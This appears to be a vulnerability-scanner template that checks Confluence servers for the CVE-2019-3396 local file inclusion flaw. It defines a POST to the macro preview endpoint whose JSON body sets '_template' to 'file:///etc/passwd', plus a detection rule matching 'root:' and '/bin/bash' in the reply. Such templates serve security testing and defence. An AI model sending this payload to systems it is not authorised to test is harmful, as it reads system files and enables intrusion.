id: jira-macro-lfi
info:
  name: Jira Confluence LFI CVE-2019-3396
  risk: High

replicate:
  ports: '8080'
  prefixes: 'jira, wiki, confluence'

requests:
  - method: POST
    redirect: false
    timeout: 30
    url: >-
     {{.BaseURL}}/rest/tinymce/1/macro/preview
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      - Accept: text/plain, */*; q=0.01
      - Content-Type: application/json
      - X-Requested-With: XMLHttpRequest
      - Referer: "{{.URL}}"
      - Connection: keep-alive
    body: >-
      {"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}

    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "/bin/bash")
